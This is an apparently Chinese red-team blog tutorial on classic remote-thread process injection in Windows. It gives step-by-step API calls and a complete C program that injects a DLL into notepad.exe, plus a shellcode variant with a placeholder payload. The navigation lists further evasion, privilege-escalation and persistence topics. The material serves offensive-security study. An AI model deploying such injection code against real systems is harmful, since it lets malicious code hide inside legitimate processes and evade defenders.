idiotc4t's blog
搜索文档…
idiotc4t's blog
关于这个博客
武器设计
我也不知道能不能写
C2手稿
先占个位置
武器化
COM组件相关的武器化开发技术
攻击demo的bof改造
Go项目反射改造
VulnBins的利用 (vuln driver)
红队研究
NtQueryInformationProcess逆向
NetUserAdd逆向
应急响应
WannaMine4.0专杀的一些技巧
防御逃避
ReflectiveDLLInjection变形应用
Execute-Assembly实现
ShadowMove复现与思考
载入第二个Ntdll绕Hook
编译时混淆字符串&函数调用
基于线程结束的EventLog绕过
动态获取系统调用(syscall)号
基于内存补丁的AMSI绕过
基于API Hook和DLL注入的AMSI绕过
基于内存补丁ETW的绕过
基于断链的DLL隐藏
基于HEX字符串执行的AV绕过
CobaltStrike Argue命令实现
简单的分离免杀
伪装PPID规避检测
伪装命令行规避检测
通过重写ring3 API函数实现免杀
动态调用无导入表编译
基于Registry的虚拟机检测
利用杀毒软件删除任意文件
反转字符串绕杀软
重新加载.text节拖钩
x64转换层&跨位数进程注入
代码与进程注入
Divide and Conquer
Clipboard Data Deliver
.NET Reflective Injection
APC Thread Hijack
CreateRemoteThread
APC Injection
Mapping Injection
Bypass Session 0 Injection
WhiteFile Offset Table Generate Shellcode
Early Bird
Early Bird & CreateRemoteThread
TLS Code Execute
SEH Code Execute
APC & NtTestAlert Code Execute
NtCreateSection & NtMapViewOfSection Code Execute
Process Hollowing
SetContext Hijack Thread
DLL Hollowing
权限提升
基于注册表劫持BypassUAC
基于dll劫持BypassUac
通过com组件BypassUAC
通过复制Token提权到SYSTEM
通过code&dll注入提权到SYSTEM
通过伪装PPID提权到SYSTEM
通过系统服务提权到SYSTEM
权限维持
主机特征绑定木马
寻找有价值的文件
获取机器安装的软件
通过API添加Windows用户
Detours InLine Hook
DLL劫持
RID劫持
自启动服务
编写简单远控
注册表自启动项
GitBook 提供支持
CreateRemoteThread
经典代码&dll注入

远程线程注入

远程线程注入是指一个进程在另一个进程中创建线程的技术,通常用于注入dll或shellcode,两者执行方式会有一些简单的差异但是原理相同,这是一种简单且稳定的经典注入方式,被很多病毒木马所青睐,此外也存在更新式的注入方式。

注入流程

  1. 1.
    打开被注入进程的句柄
  2. 2.
    通过句柄向被注入进程申请可写可执行空间
  3. 3.
    往申请的空间内写入必要数据(dllpath&shellcode)
  4. 4.
    通过windows提供的api创建线程

编程实现

0.使用函数原型

HANDLE OpenProcess(
DWORD dwDesiredAccess,
BOOL bInheritHandle,
DWORD dwProcessId
);
LPVOID VirtualAllocEx(
HANDLE hProcess,
LPVOID lpAddress,
SIZE_T dwSize,
DWORD flAllocationType,
DWORD flProtect
);
BOOL WriteProcessMemory(
HANDLE hProcess,
LPVOID lpBaseAddress,
LPCVOID lpBuffer,
SIZE_T nSize,
SIZE_T *lpNumberOfBytesWritten
);
HANDLE CreateRemoteThread(
HANDLE hProcess,
LPSECURITY_ATTRIBUTES lpThreadAttributes,
SIZE_T dwStackSize,
LPTHREAD_START_ROUTINE lpStartAddress,
LPVOID lpParameter,
DWORD dwCreationFlags,
LPDWORD lpThreadId
);

1.打开被注入进程的句柄

HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, 0, <pid>);

2.通过句柄向被注入进程申请可写可执行空间

LPVOID lpBaseAddress = VirtualAllocEx(hProcess, 0, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

3.往申请的空间内写入必要数据(dll&shellcode)

3.1 shellcode

char shellcode[]="XXXXXX";
WriteProcessMemory(hProcess, lpBaseAddress, shellcode, sizeof(shellcode), NULL);

3.2 DLL注入

char path[]="c:/test/test.dll";
WriteProcessMemory(hProcess, lpBaseAddress, path, sizeof(path), NULL);

4.通过windows提供的api创建线程

4.1 shellcode

CreateRemoteThread(hProcess, 0, 0, (LPTHREAD_START_ROUTINE)lpBaseAddress, 0, 0, 0);

4.2 DLL注入

我们都知道在进程载入DLL的时候会调用DLLMAIN函数,同时由于ASLR(基址随机化)的缘故,在操作系统启动时,DLL的加载地址不尽相同,但由于部分系统DLL要求在系统启动后必须固定,所以我们通过GetProcAddress函数获取操作系统加载DLL的函数。
也就是说,虽然进程不同但是部分系统dll在不同进程中的地址是相同的,那么我们可以通过获取本地进程的相关函数作为远程线程函数的启动参数,并把申请的空间指向加载DLL保存路径的字符串,就可以远程加载DLL。
  • 不同进程的kernel32.dll
WriteProcessMemory(hProcess, lpBaseAddress, path, sizeof(path), NULL);
LPTHREAD_START_ROUTINE pLoadlibrary = (LPTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandleA("kernel32.dll"), "LoadLibraryA");
CreateRemoteThread(hProcess, 0, 0, (LPTHREAD_START_ROUTINE)pLoadlibrary, lpBaseAddress, 0, 0);

优化与使用

  • 根据进程名查找PID
#include <Tlhelp32.h>
DWORD GetProcessIdByName(LPCTSTR lpszProcessName)
{
HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (hSnapshot == INVALID_HANDLE_VALUE)
{
return 0;
}
PROCESSENTRY32 pe;
pe.dwSize = sizeof pe;
if (Process32First(hSnapshot, &pe))
{
do {
if (lstrcmpi(lpszProcessName, pe.szExeFile) == 0)
{
CloseHandle(hSnapshot);
return pe.th32ProcessID;
}
} while (Process32Next(hSnapshot, &pe));
}
CloseHandle(hSnapshot);
return 0;
}
  • 完整代码
#include <stdio.h>
#include <Windows.h>
#include <Tlhelp32.h>
DWORD GetProcessIdByName(LPCTSTR lpszProcessName)
{
HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (hSnapshot == INVALID_HANDLE_VALUE)
{
return 0;
}
PROCESSENTRY32 pe;
pe.dwSize = sizeof pe;
if (Process32First(hSnapshot, &pe))
{
do {
if (lstrcmpi(lpszProcessName, pe.szExeFile) == 0)
{
CloseHandle(hSnapshot);
return pe.th32ProcessID;
}
} while (Process32Next(hSnapshot, &pe));
}
CloseHandle(hSnapshot);
return 0;
}
char path[] = "C:\\Users\\Black Sheep\\source\\repos\\CreateRemoteThread\\x64\\Release\\TestDll.dll";
int main()
{
HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, 0, GetProcessIdByName((LPCTSTR)"notepad.exe"));
LPVOID lpBaseAddress = VirtualAllocEx(hProcess, 0, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
WriteProcessMemory(hProcess, lpBaseAddress, path, sizeof(path), NULL);
LPTHREAD_START_ROUTINE pLoadlibrary = (LPTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandleA("kernel32.dll"), "LoadLibraryA");
CreateRemoteThread(hProcess, 0, 0, (LPTHREAD_START_ROUTINE)pLoadlibrary, lpBaseAddress, 0, 0);
return 0;
}

LINKS

Ten process injection techniques: A technical survey of common and trending process injection techniques
Elastic Blog
Programming reference for the Win32 API - Win32 apps
docsmsft
代码与进程注入 - 以前
APC Thread Hijack
下一个 - 代码与进程注入
APC Injection
最近更新 2yr ago
复制链接
大纲
远程线程注入
注入流程
编程实现
0.使用函数原型
1.打开被注入进程的句柄
2.通过句柄向被注入进程申请可写可执行空间
3.往申请的空间内写入必要数据(dll&shellcode)
4.通过windows提供的api创建线程
优化与使用
LINKS